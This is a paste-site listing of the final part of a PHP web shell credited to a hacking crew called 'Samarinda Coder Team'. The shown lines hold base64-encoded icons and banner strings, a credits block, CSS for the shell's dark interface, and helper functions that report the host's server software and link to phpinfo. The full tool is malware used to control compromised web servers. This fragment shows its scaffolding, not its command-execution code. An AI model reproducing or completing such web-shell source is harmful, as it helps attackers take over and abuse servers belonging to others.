  3299. 'CLM8MSBIJwNZJAhNRBdDR3xCCYqkGXppuZrwuVWj21mVJo+jZG812Cv288VWD+KQtQA4m4CCdJoA'.
  3300. 'ADs=',
  3301. "ext_wri"=>
  3302. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  3303. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  3304. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  3305. "ext_xml"=>
  3306. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  3307. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3308. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  3309. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  3310. "IQA7"
  3311. );
  3312. return $images;
  3313. }
  3314. function sh_name() { return base64_decode("LT09PVsgU2FtYXJpbmRhIENvZGVyIFRlYW0gXT09PS0="); }
  3315. function sh_shell() { return base64_decode("LS0gU2FtYXJpbmRhIENvZGVyIFRlYW0gLS0="); }
  3316. function sh_comm() { return base64_decode("c2FtYXJpbmRhIGNvZGVyICBodHRwOi8vc2FtYXJpbmRhLWNvZGVyLmJsb2dzcG90LmNvbQ=="); }
  3317. function alecs_tools() {
  3318. bar_header(".: TooLz :.");
  3319. }
  3320. function alecs_about() {
  3321. bar_header(".: Credits :.");
  3322. echo "<br>Idea, leader & coder: <b>--==[SAMARINDA CODER TEAM]==--</b><br>".
  3323. "Team Coder Samarinda Berdiri Sejak Tahun 2008".
  3324. "Re-coder, Designer, Windows Fix, PHP Mailer & PHP Filesystem<br><br>".
  3325. "[Special Thank's]<br>".
  3326. "<b>--==|p4km1n - SiKodoQ - Unix - Billgates - flazer|==--</b><br><br>".
  3327. "Please report bugs to <a href=\"mailto:root@anonymousteam\">root@anonymousteam</a></b>\n";
  3328. }
  3329. function html_style() {
  3330. $style = '<html>
  3331. <head>
  3332. <style>
  3333. table {width: 100%;border-collapse: collapse;}
  3334. #main, #maininfo {width: 900px;}
  3335. body, table, input, select, option, .info
  3336. {
  3337. font: 8pt tahoma;
  3338. }
  3339. .footer {font: 8pt tahoma;}
  3340. textarea, .code
  3341. {
  3342. font: 8pt Courier New;
  3343. color: #dedbde;
  3344. border: 1px solid #666666;
  3345. }
  3346. img {border: 0;}
  3347. #maininfo img {width: 16;height: 16;}
  3348. input, select, option {border: 1px solid #606060;}
  3349. #maininfo, td, th {border: 1px solid #3F3F3F;}
  3350. a {color: #5B5BFF;text-decoration: none;}
  3351. #pagebar a, .barheader a {color: #00FF00;}
  3352. a:hover, #pagebar a:hover {color: #3366FF;}
  3353. .on {color: #00FF00;}
  3354. .off, .errmsg {color: #FF0000;}
  3355. body, table, input, select, option {color : #EEEEEE;}
  3356. .info th {color: #969696;width: 13%;}
  3357. .shell {font-size: 12;color: #C0C0C0;border: 0;}
  3358. #pagebar a, .barheader, .errmsg, .on, .off
  3359. {
  3360. font-weight: bold;
  3361. }
  3362. p, form, .info, .info td, .info th, .explorer *
  3363. {
  3364. margin: 0;
  3365. }
  3366. input, #maininfo {margin: 3px;}
  3367. #mainpanel input, #mainpanel select
  3368. {
  3369. margin: 0px 2px 0px 2px;
  3370. }
  3371. #maininfo table, select {margin: 2px 0px 2px 0px;}
  3372. #pagebar, .bartitle, #mainpanel {background: #474747;}
  3373. body, textarea, .shell, input, select, option
  3374. {
  3375. background: #000000;
  3376. }
  3377. .info, .info th, .info td, input[type="label"]
  3378. {
  3379. background: transparent;
  3380. border: 0;
  3381. }
  3382. #pagebar td, #mainpanel td, #mainpanel th, .contents th, .explorer td
  3383. {
  3384. border-left: 0;
  3385. border-right: 0;
  3386. }
  3387. .bartitle, .barheader, input[type="submit"], input[type="button"], input[type="reset"]
  3388. {
  3389. color: #D0D0D0;
  3390. background: #3F3F3F;
  3391. border: 1px solid #202020;
  3392. border-top: 1px solid #505050;
  3393. border-left: 1px solid #505050;
  3394. }
  3395. input[type="submit"]:hover, input[type="button"]:hover, input[type="reset"]:hover
  3396. {
  3397. color: #00FF00;
  3398. background: #333333;
  3399. }
  3400. td, .info th {vertical-align: top;}
  3401. .explorer td {vertical-align: middle;}
  3402. .fleft {float: left;}
  3403. .fright {float: right;}
  3404. .code, .fleft, .info th {text-align: left;}
  3405. .fright, input[type="label"], #mainpanel th, .contents th
  3406. {
  3407. text-align: right;
  3408. }
  3409. #maininfo, .bartitle, .quicklaunch, .quicklaunch a, .barheader, th
  3410. {
  3411. text-align: center;
  3412. }
  3413. td, textarea, input[type="text"], .bartitle, .barheader, .code, th
  3414. {
  3415. padding: 3px;
  3416. }
  3417. .info th, .info td {padding: 0px 2px 0px 2px;}
  3418. .quicklaunch a {padding : 0px 5px 0px 5px;}
  3419. </style>
  3420.  
  3421. <title>'.sh_name().' - '.getenv("HTTP_HOST").' - </title>
  3422.  
  3423. </head>
  3424.  
  3425. <body><center>
  3426. ';
  3427. return $style;
  3428. };
  3429. function html_header() { return "<b><font size=5pt>".sh_name()."</font><br><font color='#000000'>".sh_shell()."</font><br>".sh_comm()."</b>"; }
  3430. function html_footer() { return "&copy; 2012 r3c0ded By Samarinda coder. Contact me at root@anonymousteam.com. Generated: ".round(getmicrotime()-starttime,4)." seconds"; }
  3431. function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
  3432. function srv_info($title,$contents) { echo "\t\t\t<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n"; }
  3433. function srv_software($surl) {
  3434. $srv_software = getenv("SERVER_SOFTWARE");
  3435. if (!ereg("PHP/".phpversion(),$srv_software)) { $srv_software .= ". PHP/".phpversion(); }
  3436. return str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\">PHP/".phpversion()."</a>",htmlspecialchars($srv_software));
  3437. }
  3438. function bar_header($str) { echo '<div class="barheader">'.$str.'</div'."\n"; }
  3439.  
  3440. ########################
  3441. ##[ END OF FUNCTIONS ]##
  3442. ########################
  3443. chdir($lastdir); alecsexit();
Add Comment
Please, Sign In to add comment